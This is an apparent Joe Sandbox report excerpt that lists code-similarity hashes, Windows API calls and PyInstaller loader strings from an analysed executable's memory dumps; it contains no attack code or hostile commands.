                                                                                                                                                                                                                                                              • Opcode ID: 62e974c1c6e7d120c348aa5a1d995ef2678b7903ade27c6c4b52a2abef3b6d35
                                                                                                                                                                                                                                                              • Instruction ID: b0ee3bb54718ef69568b1da1d955e3fe16bb41b7c97db4cf6aa6e1c06751a842
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62e974c1c6e7d120c348aa5a1d995ef2678b7903ade27c6c4b52a2abef3b6d35
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF31C333B2866346EA209B51A6007BA6390EF047D4F584431DE4ECBB99EE7FE545C70A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                                                                                                              • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                              • Opcode ID: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                                                                                                                                                                                                                              • Instruction ID: cacfcc97c49d1191db29cf40ebc47f57c51edaa292abfbd425200aaa9cdd5112
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b2a4badfdaa60d9abfb93841dcb65d735c0fc58e4118d1b5c2a51383b6331b7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE1AE33A287618AEB20DB25E6403AD7BA0FB447C8F104535EE5D87B95DF3AE480D706
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A8747
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A879E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                                              • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                              • API String ID: 626452242-27947307
                                                                                                                                                                                                                                                              • Opcode ID: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
                                                                                                                                                                                                                                                              • Instruction ID: bec6e4f95e7dddeb890f269d10f3a67a30ac8f096a888b46fe486c6f01618ae4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 880ff2e63ba81a384871d9a2b2c380e34ab45f047a7bf3c31ff76456a7931f4a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B41A433A28BA282E620CF15B94027AB7A1FB847E0F544135DE9D87B98DF3ED445C709
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00007FF6E60A39EA), ref: 00007FF6E60A8C31
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A29E0: MessageBoxW.USER32 ref: 00007FF6E60A2AF0
                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00007FF6E60A39EA), ref: 00007FF6E60A8CA5
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                              • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                                                                              • API String ID: 3723044601-27947307
                                                                                                                                                                                                                                                              • Opcode ID: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                                                                                                                                                                                                                              • Instruction ID: 22d8a41929dc1bf238efeb41262d05e4708a03ff637cc3794bf524abc39bdb62
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF21AD33A29B5285EB10CF16AA402787261EB84BE0B584635DA0E97794EF3FE541C709
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                                                                                                                                                                                                                              • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                                                                                                                                                                                                                              • API String ID: 3231891352-3501660386
                                                                                                                                                                                                                                                              • Opcode ID: cc873c1451c3de15d74117cc9666b8cbf5086c1c2860ba2749879c362ca7babb
                                                                                                                                                                                                                                                              • Instruction ID: 4cfda3224aa7e604182b77d114329120bac317cd94dd51cae6fcdf8b5484ffd2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc873c1451c3de15d74117cc9666b8cbf5086c1c2860ba2749879c362ca7babb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB51A537A3D66341FA2697259B503B956919F84BC0F488130E90EC77DAFE2FE500874A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADE3D
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADE4B
                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADE75
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADEBB
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6E60AE06A,?,?,?,00007FF6E60ADD5C,?,?,00000001,00007FF6E60AD979), ref: 00007FF6E60ADEC7
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                              • Opcode ID: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                                                                                                                                                                                                                              • Instruction ID: 5482abea4b296e557287476854be0b3a4ba64d8250ebf76f22af66b819e2bfae
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B631C633A3A66295EE11EB029A0077973D4BF54BE4F590534DD1E8A390EF3FE440830A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A
                                                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6E60A79A1,00000000,?,00000000,00000000,?,00007FF6E60A154F), ref: 00007FF6E60A747F
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A2B30: MessageBoxW.USER32 ref: 00007FF6E60A2C05
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6E60A7456
                                                                                                                                                                                                                                                              • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF6E60A7493
                                                                                                                                                                                                                                                              • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6E60A74DA
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                              • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                                                              • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                                                              • Opcode ID: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
                                                                                                                                                                                                                                                              • Instruction ID: 58315c164bf322f3de57da7dfb42128ad4a0058d6ffa096a604f9788c3d19125
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d2d4af577e045dbc33e2ebeb30eaa17cd958ec32487233d1e031d2a4712b08d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31A727F3C7A241FA25D721E7153BA5691AF987C0F444431DA4EC6BD6FE2FE104860A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8B1A
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6E60A87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6E60A101D), ref: 00007FF6E60A2A14
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60A29E0: MessageBoxW.USER32 ref: 00007FF6E60A2AF0
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6E60A2ABB), ref: 00007FF6E60A8BA0
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                                                              • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                                                              • API String ID: 3723044601-876015163
                                                                                                                                                                                                                                                              • Opcode ID: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                                                                                                                                                                                                                              • Instruction ID: bea32728c738545db36c269f69bcf06b3176fb8a9e00b347403fec70c5499860
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4021A533B28A5281EB10CB19FA00269A361FB847D4F584231DB5CD7BA9EF2FD5418709
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                                              • Opcode ID: 3f41bd99dd68f3966606bc7d550af5f0edca5de962d3041767b0314e9ea66860
                                                                                                                                                                                                                                                              • Instruction ID: edd936af635b025b5544b63df0920d38ca849947fe54ab695c6eace57ead4bd6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f41bd99dd68f3966606bc7d550af5f0edca5de962d3041767b0314e9ea66860
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3221A926B6862342FA286721575533962829F447B0F10C734E93EC7BCEDF6FA4014A0B
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                              • Opcode ID: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                                                                                                                                                                                                                              • Instruction ID: 5318b295cf6ffd847981d4d2006a72309c6634732865ad8699189f772744534b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 70118422B28B6186E7508B46E95432967A0FB88BF4F140234E95ECB7A4DF3FD4448759
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB897
                                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB8CD
                                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB8FA
                                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB90B
                                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB91C
                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF6E60B54CD,?,?,?,?,00007FF6E60BF1BF,?,?,00000000,00007FF6E60BB9A6,?,?,?), ref: 00007FF6E60BB937
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                                              • Opcode ID: 154d6b1ff44e9056db56d396687895a785f43ec8102cc5bf305a249fc10f374f
                                                                                                                                                                                                                                                              • Instruction ID: f5b07b72895703b9a41342867e5a4e9151b452f820ca9e74c55f9b574e4357fa
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 154d6b1ff44e9056db56d396687895a785f43ec8102cc5bf305a249fc10f374f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25115B22B2867342FA146721974533922919F447B0F549734E93EC76DADF6FA402860A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                              • String ID: csm$f
                                                                                                                                                                                                                                                              • API String ID: 2395640692-629598281
                                                                                                                                                                                                                                                              • Opcode ID: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                                                                                                                                                                                                                              • Instruction ID: 244af10eb247868321d33dd0264b56832bcc85277ec1ba94240c84848f41cb9a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4951D233A292228AE714CB11E614B393795FB80BD8F508130EE4E877C8DF7BE8418709
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                              • Opcode ID: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
                                                                                                                                                                                                                                                              • Instruction ID: eddce07042b4d617b63abc92f59e0065af947a735ae783ef0551443fdb0ce6a7
